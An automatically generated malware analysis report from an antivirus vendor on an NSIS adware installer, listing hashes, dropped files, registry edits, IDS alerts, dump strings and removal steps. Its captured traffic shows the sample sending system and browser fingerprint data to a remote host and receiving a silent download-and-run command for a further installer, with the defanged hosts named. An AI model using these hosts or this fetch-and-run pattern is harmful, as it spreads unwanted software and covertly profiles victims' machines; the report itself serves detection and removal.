SearchProtectToolbar_pcap_9baaf8eb34

by malwarelabrobot on September 18th, 2017 in Malware Descriptions.

Trojan.NSIS.StartPage.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 9baaf8eb346b33aab34e95c2649381e5
SHA1: c8fd83dd006bbd289c17a2785971dbd3f16463da
SHA256: f3b15c4b400d195697ffaa8a9056db32f0f7aa771658bde526294e4c433867dd
SSDeep: 24576:9DOKrOkpY PQbdIuXtWrDGkwmj ww rREH:c pQbCitWrB fH
Size: 990417 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-05 03:46:27
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:3676

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Banner.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\bitool.xxx (7288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsischeck654.xml (18956 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BiTool[1].dll (5984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spltmp.bmp (19096 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Aero.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-wizard.bmp (11040 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-header.bmp (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Math.dll (2461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\advsplash.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFEC9.tmp (47790 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\xml.dll (5114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp (123318 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsis142.xml (598 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll (21 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy20FC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spltmp.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFEB8.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp (0 bytes)

Registry activity

The process %original file name%.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
d43e12c4c5d319bade804d984fc058e5 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BiTool[1].dll
d43e12c4c5d319bade804d984fc058e5 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\bitool.dll
75c6e59cc3cea43af20438c3c0b76729 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Aero.dll
eac76a087f7bef5c4ea71c21680add0d c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Banner.dll
4ed2d7172521630a14197c9f2a5c799e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Math.dll
6f5257c0b8c0ef4d440f4f4fce85fb1b c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\System.dll
6def2cf3daf850acdc1a3e7340a439c4 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\advsplash.dll
d7a3fa6a6c738b4a3c40d5602af20b08 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\inetc.dll
0745ff646f5af1f1cdd784c06f40fce9 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\md5dll.dll
d9256d9acaecabb20b7e9a1595abfa36 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll
42df1fbaa87567adf2b4050805a1a545 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\xml.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23610 24064 4.44336 e5e7adda692e6e028f515fe3daa2b69f
.rdata 28672 4558 4608 3.6294 5801d712ecba58aa87d1e7d1aa24f3aa
.data 36864 108536 1024 3.48418 cc58d0a55ac015d8f1470ea90f440596
.ndata 147456 180224 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 327680 293000 293376 3.76795 b00feb2ddadebfa05fca759303728af3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://d27foqb3kkzkt9.cloudfront.net/sdk/binsis/2.3a/BiTool.dll 54.239.168.171
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/get_pre_offering_checks?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 54.239.168.188
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/xml?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 54.239.168.188
sub.spirlymo.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /sdk/binsis/2.3a/BiTool.dll HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d27foqb3kkzkt9.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 102912
Connection: keep-alive
Server: nginx
Date: Thu, 09 Mar 2017 12:00:08 GMT
Last-Modified: Tue, 28 Oct 2014 10:54:19 GMT
ETag: "544f75db-19200"
Expires: Thu, 09 Mar 2017 12:10:08 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 57
X-Cache: Hit from cloudfront
Via: 1.1 017ee4b2e5ba6b7a7dd1443f39b6e832.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Tn8cH4-sevBE2jVnTv4bXfjcDqAonEtX5RGfYZkpupYe8dYJK0L6hg==
....x...3..E.P.E.d............z....E......E...E............ ........P.
...............s.............E............H..........M.d......Y.M.3...
.....]..........U..Q.M..M........k....E...].....U..Q.M..M........{....
.]........U..j.h./..d.....P..0.x...3.P.E.d......M..s....E......E......
E...E.P.M.Q..................s....U.R..........................E..E...
...M..D....E..M.d......Y..]...U..Q.M..M..........M..........E...].....
........U..Q.M..M..........M...........]................U..j.h.-..d...
..P.. .x...3.P.E.d......M.......E......E......E...E.P.M.Q.U.R.........
.........O..............E.P.M.Q..................'.........m.......E..
E......M..8....E..M.d......Y..].......U..Q.M..M.....n....E...]........
U..Q.M..M...........]...........U.....S.}.........E..E..}..t..}..t?.}.
.tm......M.Q.U.R.E.P..................`..............M..H..i.U.R.E.P.M
.Q..................,..............U..P..5.}......E.P.M.Q.U.R......]..
...................W...........E..E..}..t..}..t..}..tN.s.M.Q.U.R......
.................M..H..M.U.R.E.P.......................M..H(.'.}......
U.R.E.P..................U.....[..]...............U....(.M... ...M....
...E.Pj.......z..................M...j..U.R.M..I....E.Pj.......I......
......&..P.M...7..............M..A....P.;U........}.........E.P.M.....
..............M...j..U.R.M.. ....E.P.M.............%..P.M..A7.......t@
.M.......P.;U.u..E..E..}..t..}..t....M.......@..D.M..........7...M..M.
.}..t..}..t....M..~....@(...M..q.............3...]..................U.
..}..|<.E.P.M.Q.U.R.E.P........................................
<<< skipped >>>


GET /binsis/get_pre_offering_checks?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 16 Sep 2017 23:18:05 GMT
Expires: Sat, 16 Sep 2017 20:31:25 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 41903dc3828cdce2b3daa3c944827b92.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vZAm34Mx8AHs9dvV5NRssT4ebBu9ri_-JnuTcl5CGYnVxOcIIizYlg==
31f8..<?xml version="1.0"?>.<pre_offering_checks><check
 type="registry" return_name="check_4" return_value_type="boolean">
<value_to_check><key>HKCU\Software\Somoto\SDP</key>&
lt;name>uid</name></value_to_check></check><ch
eck type="registry" return_name="check_2182" return_value_type="boolea
n"><value_to_check><key>HKLM\SOFTWARE\Goobzo\YouTube Ac
celerator</key><name>version</name></value_to_che
ck></check><check type="registry" return_name="check_2246"
 return_value_type="boolean"><value_to_check><key>HKLM\
SOFTWARE\YTDownloader</key><name>version</name></
value_to_check></check><check type="registry" return_name=
"check_2450" return_value_type="boolean"><value_to_check><
key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Hotspo
tShield</key><name>DisplayName</name></value_to_c
heck></check><check type="registry" return_name="check_385
0" return_value_type="boolean"><value_to_check><key>HKL
M\SOFTWARE\YTDownloader</key><name>version</name><
;/value_to_check></check><check type="registry" return_nam
e="check_2056" return_value_type="boolean"><value_to_check>&l
t;key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sear
chProtect</key><name>DisplayName</name></value_to
_check></check><check type="registry" return_name="che
<<< skipped >>>

POST /binsis/xml?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Filename: nssFCB.tmp
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Content-Length: 10041
Connection: Keep-Alive
Cache-Control: no-cache

installer_data={"uid":"82B9B6A5FD0041398E063EA8F63FA48B","muid":"8d207bd7870e2fd5ffd9640909f43c11","affid":"lionskin","sid":"lionskin","installerVersion":"2.3.4","osVersion":"6.1.7601 32bit","ieVersion":"9.0.8112.16421","ff_installed":"1","ff_version":"49.0.1.6109","ff_default_homepage":"about:blank","ff_is_default":"0","ie_installed":"1","ie_version":"9.0.8112.16421","ie_default_homepage":"about:blank","ie_is_default":"1","chrome_installed":"0","chrome_version":"","chrome_default_homepage":"not_found","chrome_is_default":"0","opera_installed":"0","opera_version":"","opera_default_homepage":"not_found","opera_is_default":"0","safari_installed":"0","safari_version":"","safari_default_homepage":"not_found","safari_is_default":"0","check_4":"false","check_2182":"false","check_2246":"false","check_2450":"false","check_3850":"false","check_2056":"false","check_2060":"false","check_3360":"false","check_2832":"false","check_4042":"false","check_4044":"false","avs_chk_avast_reg_id_1":"false","avs_chk_avast
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 16 Sep 2017 23:18:10 GMT
Vary: Accept-Encoding
Expires: Sat, 16 Sep 2017 20:31:30 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 41903dc3828cdce2b3daa3c944827b92.cloudfront.net (CloudFront)
X-Amz-Cf-Id: rUxaAckN748LeeryRDtHVaB47GnmKIUKGwBSyldPGBw15P9zHjoVzA==
256..<?xml version="1.0" encoding="windows-1252"?>.<sponsored
_data><downloader><url>hXXp://sub.spirlymo.com/installe
rs/bi_downloader/1505602947043/setup.exe</url><downloadOnInit
>1</downloadOnInit><args>/silent /initurl hXXp://sub.yo
rkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%Softwa
reID%" -affid="¯filiateID%" -muid="%MUID%"</args></download
er><offers/><additional_data><tokyo_csrf2_key>a76
146b5d45ec851b1bf28ccb70e74ed</tokyo_csrf2_key><tokyo_csrf2_t
imestamp>1505603890</tokyo_csrf2_timestamp><ping_domain>
;hXXp://sub.yorkshatb.com</ping_domain></additional_data>&
lt;/sponsored_data>...0..HTTP/1.1 200 OK..Content..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3676:

.text
`.rdata
@.data
.ndata
.rsrc
Vj%SSS
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ers\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll
Anti-Virus (AV) Edition for Windows_is1
ault_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll
t/Windows/CurrentVersion/Uninstall/Kaspersky"
":"lionskin","installerVersion":"2.3.4","osVersion":"6.1.7601 32bit","ieVersion":"9.0.8112.16421"
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp
raprefs.ini
install\Google Chrome
2014 skinpacks.com
.reloc
WINMM.dll
AdvSplash.dll
@.reloc
GetProcessHeap
comdlg32.dll
nsDialogs.dll
All Files|*.*
xml.dll
.?AVexecution_error@TinyXPath@@
Assertion failed: %s, file %s, line %d
zcÁ
cn?%C
zF%c?5
G.oXi
.Ck6M
wEby
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp
nssFCB.tmp
yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="¯filiateID%" -muid="%MUID%"
.default
1e5.exe
rentVersion\Uninstall\eScan Anti-Virus (AV) Edition for Windows_is1
3967CDD-F8BD-4AC9-8369-0D2BD8F246F5}
plore.exe
ninstall\eScan Anti-Virus (AV) Edition for Windows_is1
Microsoft/Windows/CurrentVersion/Uninstall/Kaspersky"
r_lso_data_enabled":true,"default_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","
Uninstall\eScan Anti-Virus (AV) Edition for Windows_is1
e":"13122112111791155","browser":{"clear_lso_data_enabled":true,"default_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","
Version\Uninstall\eScan Anti-Virus (AV) Edition for Windows_is1
5250224
c:\%original file name%.exe
C:\SkinPack\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nssFEB8.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
571083322
1049060
{"account_id_migration_state":2,"account_tracker_service_last_update":"13122112111791155","browser":{"clear_lso_data_enabled":true,"default_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy20FC.tmp
/silent /initurl hXXp://sub.yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="¯filiateID%" -muid="%MUID%"
hXXp://sub.spirlymo.com/installers/bi_downloader/1505602947043/setup.exe
1505603890
hXXp://sub.yorkshatb.com
-1727723021
1180086
1628046802
-2046754816
-2147410511
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b2</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
"$4\IconCache.db"

%original file name%.exe_3676_rwx_10004000_00001000:

callback%d


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Banner.dll (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\inetc.dll (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\bitool.xxx (7288 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsischeck654.xml (18956 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BiTool[1].dll (5984 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spltmp.bmp (19096 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Aero.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-wizard.bmp (11040 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-header.bmp (3312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Math.dll (2461 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\advsplash.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFEC9.tmp (47790 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\md5dll.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\xml.dll (5114 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp (123318 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsis142.xml (598 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll (21 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now